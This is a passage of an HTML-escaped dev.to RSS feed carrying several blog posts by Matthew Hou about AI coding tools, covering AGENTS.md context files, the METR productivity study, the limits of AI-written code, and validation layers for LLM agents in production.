  What actually works: 30 lines of markdown
&lt;/h2&gt;

&lt;p&gt;I keep a file called &lt;code&gt;AGENTS.md&lt;/code&gt; at the project root:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="gh"&gt;# AGENTS.md&lt;/span&gt;

&lt;span class="gu"&gt;## Conventions&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; Error handling: wrap in try/catch, use AppError class
&lt;span class="p"&gt;-&lt;/span&gt; Pagination: cursor-based, not offset
&lt;span class="p"&gt;-&lt;/span&gt; Tests: co-located, use test factories
&lt;span class="p"&gt;-&lt;/span&gt; Naming: camelCase for JS, snake_case for DB

&lt;span class="gu"&gt;## Common Gotchas&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; Don't use &lt;span class="sb"&gt;`users`&lt;/span&gt; table directly — go through UserService
&lt;span class="p"&gt;-&lt;/span&gt; Rate limiting is middleware-level, not per-route
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Takes maybe an hour to write well. And &lt;strong&gt;it's portable&lt;/strong&gt; — I've used variations with Cursor, Copilot, and Claude Code. The format changes; the knowledge doesn't.&lt;/p&gt;

&lt;h2&gt;
  
  
  What it doesn't solve
&lt;/h2&gt;

&lt;p&gt;I won't oversell this. The honest trade-offs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Setup cost is real.&lt;/strong&gt; Maybe 2-3 days for a large project. And it needs maintenance — when patterns evolve, the file evolves too.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Greenfield projects?&lt;/strong&gt; AI will still hallucinate conventions when there aren't any yet.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;High-stakes code&lt;/strong&gt; (auth, payments, migrations) — I still do full manual review regardless.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;But for the &lt;strong&gt;80% of code&lt;/strong&gt; that follows established patterns? Context files are the highest-leverage investment I've found.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  The era question
&lt;/h2&gt;

&lt;p&gt;Here's what I keep coming back to. Nobody knows what the AI tooling landscape looks like in a year. That's unsettling. Models will change, tools will change, pricing will change.&lt;/p&gt;

&lt;p&gt;But documented conventions? Those are durable. Whether you're using Copilot today or some agent framework next year, the AI still needs to know your team's patterns. The markdown file that took you an hour to write will still be useful in 2027.&lt;/p&gt;

&lt;p&gt;A solo developer today can build what took a team of 10 — but only if the AI can pick up the patterns without a month of onboarding. Context files are how you get there.&lt;/p&gt;

&lt;h2&gt;
  
  
  The open question (I actually want your answer)
&lt;/h2&gt;

&lt;p&gt;Here's what I haven't cracked: &lt;strong&gt;how do you keep context files in sync with a fast-moving codebase?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I've tried pre-commit hooks that validate AGENTS.md against actual code patterns. It sort of works. But I'm curious — has anyone found a better approach? Or do you just accept some drift and do periodic manual updates?&lt;/p&gt;

&lt;p&gt;I'm also wondering: what do you put in your context files that I'm missing? Every time I think mine are complete, someone mentions a convention I forgot to document.&lt;/p&gt;

&lt;p&gt;Your answers genuinely shape what I write next. The METR post started as a simple study summary — your comments turned it into a month-long investigation into how AI actually performs. If something here doesn't match your experience, or you've found something better, I want to know.&lt;/p&gt;

&lt;p&gt;Thanks for being here.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;P.S. I package what I learn into tools. If you want context files and spec templates your AI follows automatically: &lt;a href="https://updatewave.gumroad.com/l/qqeonx" rel="noopener noreferrer"&gt;3 Skill Files&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>discuss</category>
      <category>codequality</category>
    </item>
    <item>
      <title>Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Tue, 24 Feb 2026 03:56:47 +0000</pubDate>
      <link>https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84</link>
      <guid>https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84</guid>
      <description>&lt;p&gt;Last month, METR published a study that should make every developer uncomfortable.&lt;/p&gt;

&lt;p&gt;They took 16 experienced open-source developers — people who knew their codebases inside out — and randomly assigned tasks to be done with or without AI tools.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Predicted&lt;/th&gt;
&lt;th&gt;Measured&lt;/th&gt;
&lt;th&gt;Post-study belief&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Speed impact&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;+24% faster&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-19% slower&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;"It helped me"&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;I've been using AI coding tools daily for the better part of a year. When I read that study, my first reaction was "well, those developers must have been doing it wrong." My second reaction was: &lt;em&gt;that's exactly the kind of thinking the study warns about.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Perception Gap Is the Real Finding
&lt;/h2&gt;

&lt;p&gt;The speed numbers get all the attention, but I think the important finding is the perception gap. We &lt;em&gt;feel&lt;/em&gt; faster because AI handles the boring parts — boilerplate, syntax, the stuff that feels like work but isn't where the actual difficulty lives. Meanwhile, the hard parts get harder: understanding what AI changed, verifying it's correct, keeping a mental model of code you didn't write.&lt;/p&gt;

&lt;p&gt;Simon Willison — the guy behind Datasette and one of the most prolific AI-assisted developers I know of — wrote something that stuck with me:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"I no longer have a solid mental model of what my projects can do and how they work."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This is a developer who's built 80+ tools with AI assistance. If he's struggling with mental models, maybe the issue isn't experience level.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why AI Coding Tools Don't Save Time (Yet)
&lt;/h2&gt;

&lt;p&gt;Here's how I think about it now:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Before AI:  Think → Write → Test → Debug
With AI:    Describe → Review → Verify → Debug AI → Debug your understanding
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The writing step got cheaper. Everything else got more expensive. And "reviewing code you didn't write" is cognitively harder than "writing code you understand" — anyone who's done code review knows this.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"AI turned us all into Jeff Bezos — automated the easy work, left all the hard decisions." — Steve Yegge&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The METR study essentially confirmed what a lot of us have been feeling but didn't want to admit: AI coding tools don't save time. At best, they &lt;em&gt;redistribute&lt;/em&gt; where your attention goes. At worst, they create an illusion of productivity while the cognitive load actually increases.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Use AI Coding Tools Effectively (What I Changed)
&lt;/h2&gt;

&lt;p&gt;I stopped optimizing for speed. Instead, I started asking: &lt;strong&gt;"where is my attention going?"&lt;/strong&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  1. I front-load the thinking, not the prompting.
&lt;/h3&gt;

&lt;p&gt;Before I touch any AI tool, I write down — in plain text — what I want, why I want it, and what "done" looks like. Not for the AI. For me. This takes 5-10 minutes and it's the most impactful thing I do all day, because it forces me to think before generating.&lt;/p&gt;

&lt;p&gt;Kent Beck calls this the distinction between "augmented coding" and "vibe coding." The latter is hoping the AI gives you working code. The former is knowing what working code looks like &lt;em&gt;before&lt;/em&gt; the AI writes it.&lt;/p&gt;




&lt;h3&gt;
  
  
  2. I treat verification as the actual job.
&lt;/h3&gt;

&lt;p&gt;I used to think of code review as a chore you do after the real work. Now it IS the real work. StrongDM's team took this to the extreme — their "Dark Factory" setup has zero human code review. All investment goes into tests, tools, and simulations. The humans define what correct looks like. The machines do everything else.&lt;/p&gt;

&lt;p&gt;I'm not there yet, but the direction is clear: my value isn't in writing code. It's in defining what "correct" means for my specific context.&lt;/p&gt;




&lt;h3&gt;
  
  
  3. I stopped measuring productivity in output.
&lt;/h3&gt;

&lt;p&gt;More lines of code is not more productivity. More PRs is not more productivity. The Harness 2025 survey found that &lt;strong&gt;67% of developers&lt;/strong&gt; spend &lt;em&gt;more&lt;/em&gt; time debugging AI-generated code than they would have spent writing it themselves. If that's you, generating more code faster is making things worse, not better.&lt;/p&gt;

&lt;p&gt;The metric I care about now: how much of my attention went to decisions only I can make? Architecture choices, user-facing trade-offs, "should we even build this" — that's the stuff AI can't do. Everything else, I want to automate not because it's faster, but because it frees up mental bandwidth for the hard problems.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Uncomfortable Truth About AI Coding Productivity
&lt;/h2&gt;

&lt;p&gt;If the METR study is right — if AI tools don't actually save time for experienced developers on familiar codebases — then the value proposition of AI coding isn't "10x productivity." It's something more subtle:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The ability to spend your attention on higher-impact work, if you're disciplined enough to actually do it.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's a much harder sell than "write code faster." It requires you to know what high-impact work looks like, and to resist the dopamine hit of watching AI generate 200 lines in 3 seconds.&lt;/p&gt;

&lt;p&gt;I don't have this figured out. Some days I still catch myself vibe coding and pretending the output is good because it compiled. The METR study's perception gap isn't just about their participants — it's about all of us.&lt;/p&gt;

&lt;p&gt;But at least now, when I feel productive with AI, I stop and ask: &lt;em&gt;am I actually productive, or does it just feel that way?&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Productivity
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-real-cost-of-running-ai-coding-agents-its-not-what-you-think-2oon"&gt;The Real Cost of Running AI Coding Agents (It's Not What You Think)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>testing</category>
      <category>discuss</category>
      <category>codequality</category>
    </item>
    <item>
      <title>I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Mon, 23 Feb 2026 15:07:55 +0000</pubDate>
      <link>https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi</link>
      <guid>https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi</guid>
      <description>&lt;p&gt;There's a popular narrative right now: let AI handle your code, review the output, ship faster. I bought into it. I still use AI coding tools every single day.&lt;/p&gt;

&lt;p&gt;But after months of daily use, I've developed a very specific list of things I will and won't let AI coding tools touch. Not from theory — from watching things break.&lt;/p&gt;

&lt;p&gt;If you're in the same position — using AI daily but building up a quiet list of "not this" — I think you'll recognize what's here. And I'm curious what's on your list that isn't on mine.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Coding Tools Are Genuinely Great At
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Boilerplate.&lt;/strong&gt; CRUD endpoints, validation schemas, form wiring, data transformation layers. AI handles repetition without getting bored or introducing typos. What used to take 30 minutes of mechanical typing now takes 3 minutes of review.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Refactoring with clear instructions.&lt;/strong&gt; "Separate business logic from the transport layer" — give AI a well-scoped structural task and it produces directionally correct results. Not perfect, but a solid starting point that saves real time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Test scaffolding.&lt;/strong&gt; Happy path tests, edge case templates, baseline coverage expansion. AI can generate 20 test cases in the time it takes me to write 3. The catch is that I still need to review every assertion for domain correctness.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I've Stopped Trusting AI Coding Tools With
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Anything involving implicit system knowledge.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Your codebase has invisible dependencies. A 30-second timeout that exists for a reason nobody documented. A cache that depends on referential equality. A hook that adds global listeners. AI doesn't know these things exist. It will confidently change them, and everything will compile. The bug shows up three weeks later.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Architectural decisions across files.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;AI optimizes locally. It writes clean code for the file you're looking at. But it doesn't protect global coherence. I've watched AI introduce three slightly different patterns for the same abstraction across different files in the same PR. Each file looked great in isolation. The codebase got worse.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Error handling in async code.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This one bit me hard. AI generates async/await code that looks correct but has subtle issues: missing error propagation, overly optimistic null assumptions, try/catch blocks that swallow important failures. The code compiles and passes basic tests. Then production surfaces the edge cases.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Mental Model for Using AI Coding Tools Effectively
&lt;/h2&gt;

&lt;p&gt;I treat AI like a fast junior engineer who has read every Stack Overflow answer but has never maintained a production system. That means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Great for generating options.&lt;/strong&gt; "Show me three ways to structure this." Then I pick the one that fits the existing codebase.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bad for making judgment calls.&lt;/strong&gt; "Should we add a cache here?" requires understanding traffic patterns, consistency requirements, and operational complexity that AI simply doesn't have.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Excellent for the first 80%.&lt;/strong&gt; AI gets me to a working draft fast. The last 20% — making it production-ready — still takes the same human effort it always did.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  How AI Coding Tools Are Changing the Developer Role
&lt;/h2&gt;

&lt;p&gt;Here's what I keep thinking about:&lt;/p&gt;

&lt;p&gt;Nobody knows what software engineering looks like in 2 years. That's terrifying. The skills that matter are shifting under us in real time. Last month &lt;a class="mentioned-user" href="https://dev.to/gass"&gt;@gass&lt;/a&gt; left a blunt comment on my METR post: "If you are programmer, program you lazy bastard." It made me laugh, but there's something real underneath it — if you outsource everything to AI, you lose the judgment that makes you valuable.&lt;/p&gt;

&lt;p&gt;But also — a solo developer can now build things that took a team of 10. That's unprecedented and genuinely exciting. The developers who'll thrive aren't the ones who generate the most code. They're the ones who reject the most output.&lt;/p&gt;

&lt;p&gt;The only way I've found to stay sane is to build in public and learn from people who push back on my assumptions. &lt;a class="mentioned-user" href="https://dev.to/mahima_heydev"&gt;@mahima_heydev&lt;/a&gt; has left several comments across my posts about the hidden cost of AI not being time but &lt;em&gt;confidence&lt;/em&gt; — people ship changes they don't fully understand. That observation keeps evolving my thinking.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Best AI Coding Tools Shift Thinking, Not Typing
&lt;/h2&gt;

&lt;p&gt;The biggest change isn't that I code faster. It's that I think differently.&lt;/p&gt;

&lt;p&gt;I spend more time on constraints before I start. I write clearer specifications. I think about edge cases upfront because I know AI won't catch them later.&lt;/p&gt;

&lt;p&gt;AI didn't reduce the thinking. It moved where the thinking happens — from implementation to design. And honestly, that's probably where it should have been all along.&lt;/p&gt;

&lt;h2&gt;
  
  
  One Rule for Using Any AI Coding Tool
&lt;/h2&gt;

&lt;p&gt;Don't let AI handle something you couldn't review yourself. If you don't understand the output well enough to spot a subtle bug, you're not saving time — you're creating debt.&lt;/p&gt;

&lt;p&gt;The best AI-assisted developers I know aren't the ones who generate the most code. They're the ones who reject the most output. That judgment is the actual skill.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's on Your List?
&lt;/h2&gt;

&lt;p&gt;I genuinely don't take your attention for granted. You could be scrolling past this, but you stopped to think about where AI actually fails. If you've hit a wall I haven't described — or if you trust AI with something I've written off — I want to hear it.&lt;/p&gt;

&lt;p&gt;Some of the best corrections to my workflow came from someone saying "actually, that's not right" in a comment section. That's worth more than any tutorial.&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-real-cost-of-running-ai-coding-agents-its-not-what-you-think-2oon"&gt;The Real Cost of Running AI Coding Agents (It's Not What You Think)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>discuss</category>
      <category>codequality</category>
    </item>
    <item>
      <title>Your AI Agent Doesn't Need More Intelligence — It Needs Better Plumbing</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Mon, 23 Feb 2026 14:51:25 +0000</pubDate>
      <link>https://dev.to/matthewhou/your-ai-agent-doesnt-need-more-intelligence-it-needs-better-plumbing-462f</link>
      <guid>https://dev.to/matthewhou/your-ai-agent-doesnt-need-more-intelligence-it-needs-better-plumbing-462f</guid>
      <description>&lt;p&gt;If you're building with AI right now, you've probably had this moment: the demo works perfectly, you ship it, and then production surfaces every edge case the model never considered. Hallucinated IDs. Ignored constraints. Fluent, confident, wrong output.&lt;/p&gt;

&lt;p&gt;You're not alone. I've been there — and based on the conversations happening in my comment sections, a lot of you are hitting the exact same wall.&lt;/p&gt;

&lt;p&gt;Last week I watched a demo where an AI agent processed a customer refund using a hallucinated customer ID. The LLM was confident. The code was clean. The refund went through. Nobody caught it for three minutes.&lt;/p&gt;

&lt;p&gt;That three-minute gap is the entire story of AI in production right now.&lt;/p&gt;

&lt;h2&gt;
  
  
  What your comments taught me
&lt;/h2&gt;

&lt;p&gt;After my METR study post, &lt;a class="mentioned-user" href="https://dev.to/leob"&gt;@leob&lt;/a&gt; left a comment that reframed how I think about this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Maybe we should move away from the idea of using AI tools for 'coding' only, and use it more in an 'advisory' role instead — as virtual brainstorming buddies."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That stuck with me. Because the reliability problem isn't about the AI's reasoning — it's about us treating generation as the finished product instead of the starting point. &lt;a class="mentioned-user" href="https://dev.to/signalstack"&gt;@signalstack&lt;/a&gt; put it even more sharply: "Generation got cheap. Verification didn't."&lt;/p&gt;

&lt;p&gt;Those two comments are basically the thesis of this article.&lt;/p&gt;

&lt;h2&gt;
  
  
  The demo-to-production gap is a plumbing problem
&lt;/h2&gt;

&lt;p&gt;Most AI demos are one prompt, one model call, one result. It looks like magic. Then you ship it and discover the model hallucinates, ignores constraints, and produces outputs that are fluent but subtly wrong.&lt;/p&gt;

&lt;p&gt;The fix isn't a better model. It's better plumbing.&lt;/p&gt;

&lt;p&gt;When I started running AI workflows daily, I assumed the bottleneck would be model quality. It wasn't. The bottleneck was everything around the model: input validation, output verification, retry logic, state management, error handling.&lt;/p&gt;

&lt;p&gt;The boring stuff. The plumbing.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "plumbing" actually looks like
&lt;/h2&gt;

&lt;p&gt;Here's the architecture shift that made my AI workflows reliable:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Before:&lt;/strong&gt; User request → LLM call → output to user&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;After:&lt;/strong&gt; User request → input cleaning → LLM call → output validation → decision gate (pass/retry/escalate) → formatting → output to user&lt;/p&gt;

&lt;p&gt;That "decision gate" is the key piece most people skip. It's where you check: did the model actually follow the constraints? Is this output structurally valid? Does this make sense given what we know?&lt;/p&gt;

&lt;p&gt;Sometimes the gate triggers a retry with a modified prompt. Sometimes it routes to a different model. Sometimes it just says "I can't confidently answer this" — which is infinitely better than confidently being wrong.&lt;/p&gt;

&lt;h2&gt;
  
  
  The cost reality nobody talks about
&lt;/h2&gt;

&lt;p&gt;Token prices are dropping. People see this and think "AI is getting cheaper."&lt;/p&gt;

&lt;p&gt;Not exactly.&lt;/p&gt;

&lt;p&gt;A single model call is cheap. A reliable system rarely uses a single call. One user request might trigger: generation, evaluation, regeneration, formatting, tool calls. The user sees one answer. The backend ran a small workflow.&lt;/p&gt;

&lt;p&gt;I've seen my per-request cost go up 3-5x after adding proper validation layers. But my error rate dropped by an order of magnitude. That trade-off is worth it every time.&lt;/p&gt;

&lt;p&gt;The analogy I keep coming back to: saying "tokens are cheap, therefore AI is cheap" is like saying screws are cheap, therefore airplanes are cheap.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three patterns that actually work
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. Validate outputs against a schema, not vibes&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Don't just check if the output "looks right." Define a concrete schema for what you expect. If your agent is supposed to return a JSON with specific fields, validate every field. If it's generating code, run it against your test suite before accepting it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Build retry loops with variation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When validation fails, don't just retry with the same prompt. Modify something: add the error message as context, simplify the request, try a different model. I typically cap at 3 retries before escalating to a human or returning an explicit failure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Separate the "thinking" from the "doing"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let the LLM reason about what to do. Then have a separate, deterministic system actually execute it. The LLM decides "refund customer X $50." A validation layer checks: does customer X exist? Is $50 within the refund policy? Only then does the actual API call happen.&lt;/p&gt;

&lt;h2&gt;
  
  
  The uncomfortable truth
&lt;/h2&gt;

&lt;p&gt;Nobody knows what software engineering looks like in 2 years. That's terrifying. The tools change faster than anyone can keep up.&lt;/p&gt;

&lt;p&gt;But also — making AI reliable is just engineering. Every powerful but unreliable technology goes through this phase. Databases needed ACID. Networks needed TCP. AI needs its own reliability layer.&lt;/p&gt;

&lt;p&gt;The engineers who figure out this plumbing will be the ones building things that actually work. The ones chasing the next model release will keep rebuilding their demos.&lt;/p&gt;

&lt;p&gt;The only way I've found to stay sane through this is to build in public and learn from people who push back on my assumptions. &lt;a class="mentioned-user" href="https://dev.to/mahima_heydev"&gt;@mahima_heydev&lt;/a&gt; pointed out in my last post that the real hidden cost isn't time — it's confidence. People ship changes they don't fully understand. That observation changed how I think about validation layers: they're not just catching bugs, they're preserving your ability to trust your own system.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I want to hear from you
&lt;/h2&gt;

&lt;p&gt;If you're running AI in production — what's your plumbing look like? Are you hand-rolling validation, using a framework, or still flying without a net?&lt;/p&gt;

&lt;p&gt;I genuinely appreciate every one of you who takes the time to share what you're seeing. Some of the best architectural decisions in my projects started as a sentence someone left in a comment. This isn't a platitude — it's literally how my last three posts evolved.&lt;/p&gt;

&lt;p&gt;If something here doesn't match your experience, I want to know. That's how this gets better.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;P.S. I package what I learn into tools. If you want executable workflow files that add validation gates and retry logic to your AI workflows automatically: &lt;a href="https://updatewave.gumroad.com/l/qqeonx" rel="noopener noreferrer"&gt;3 Skill Files&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>discuss</category>
      <category>llm</category>
    </item>
    <item>
      <title>LLMs in Production Are Not Magic — They're Plumbing</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Mon, 23 Feb 2026 10:02:34 +0000</pubDate>
      <link>https://dev.to/matthewhou/llms-in-production-are-not-magic-theyre-plumbing-1ag3</link>
      <guid>https://dev.to/matthewhou/llms-in-production-are-not-magic-theyre-plumbing-1ag3</guid>
      <description>&lt;p&gt;There's a great post on Dev.to right now arguing that LLMs are not deterministic and making them reliable is expensive. The author is right about both things. But I want to push on the "expensive" part, because I think most developers overestimate the difficulty and underestimate how mundane the solutions actually are.&lt;/p&gt;

&lt;p&gt;Making LLMs reliable in production is not an AI problem. It's a plumbing problem.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Demo vs. Production Gap
&lt;/h2&gt;

&lt;p&gt;Every AI demo looks magical. One prompt, one model call, one beautiful result.&lt;/p&gt;

&lt;p&gt;Then you try to ship it.&lt;/p&gt;

&lt;p&gt;The model hallucinates a field name. It returns JSON with a trailing comma. It gives you a confident answer that's wrong in a way you'd never anticipate. It works perfectly 97 times out of 100, and the 3 failures are catastrophic.&lt;/p&gt;

&lt;p&gt;This is not a bug. This is the fundamental nature of probabilistic systems. If you're surprised by it, you haven't shipped one yet.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Boring Solutions That Actually Work
&lt;/h2&gt;

&lt;p&gt;Here's what I've found works in practice, running AI-powered workflows daily:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Structured Output, Always
&lt;/h3&gt;

&lt;p&gt;Never let the model free-form respond when you need to act on the output. Use JSON mode, function calling, or whatever structured output format your model supports. If the model's response needs to be parsed by code downstream, force it into a schema.&lt;/p&gt;

&lt;p&gt;This alone eliminates maybe 60% of production issues.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Validate Like It's User Input
&lt;/h3&gt;

&lt;p&gt;Treat every LLM response the way you'd treat a form submission from a user. Validate types, check required fields, verify that values are within expected ranges.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Don't do this
&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;call_llm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nf"&gt;do_something&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;

&lt;span class="c1"&gt;# Do this
&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;call_llm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;validated&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;validate_schema&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;expected_schema&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;validated&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;errors&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;retry_or_fallback&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;do_something&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validated&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
